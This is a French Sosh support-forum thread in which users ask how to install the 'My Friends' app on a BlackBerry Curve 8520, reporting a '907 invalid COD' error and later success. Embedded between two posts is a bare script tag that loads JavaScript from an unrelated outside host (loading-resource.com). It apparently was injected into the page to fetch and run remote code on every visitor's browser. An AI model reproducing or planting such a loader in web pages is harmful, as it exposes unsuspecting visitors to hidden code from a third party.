annuler
Affichage des résultats de 
Rechercher plutôt 
Vouliez-vous dire : 

My friends et blackberry curve 8520 ?

Maylis.D
Mini sosheur

Bonjour, 
J'ai recemment pris le forfait sosh à 9 euros 90 avec My friends illimités, mais malgré toutes les explicatiions à ce sujet, je n'arrive pas à installer My friends sur mon téléphone, et il ne se connecte pas pour avoir le lien. Comment puis-je faire ?? Je n'aurais pas prit ce forfait si il n'y avait pas facebook illimité... Merci de votre réponse. 

13 réponses13

Bonjour à tout le monde ( @Karim )

Je relance le sujet car j'ai le même problème, j'ai réussi une première fois à télécharger (et non sans mal) et à utiliser l'application my friend.

J'ai supprimé l'application car celle ci s'est bloquée lors du chargement, alors pensant que c'était un bug et ne pouvant rien faire, je me suis dis que j'allais la re télécharger.

Cependant là je n'y arrive pas et j'ai toujours ces messages d'erreur (comme les premières fois)
: " 907 invalid COD " & "907 invalid COD echec de l'opération de récupération de page (CacheResult vide)"

J'aimerais savoir que dois-je faire pour ravoir cette application sur mon portable.

En espérant avoir une réponse rapide :Content:

Bonne soirée

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Après plusieurs tentatives, il semblerait que ça a fonctionné ! :Content:

Ne perdez pas espoir !! Avoir l'application My Friends sur son Blackberry Curve 8520 c'est possible !!

:smileyhappy: :smileyvery-happy:

Soyez patient(e) et percévérant(e)  !!

karim
Ancien intervenant Sosh

Bonjour et merci de votre retour. :Content:

signature_webcc_sosh.jpg

avez vous le forfait à 9,90 euros ? merci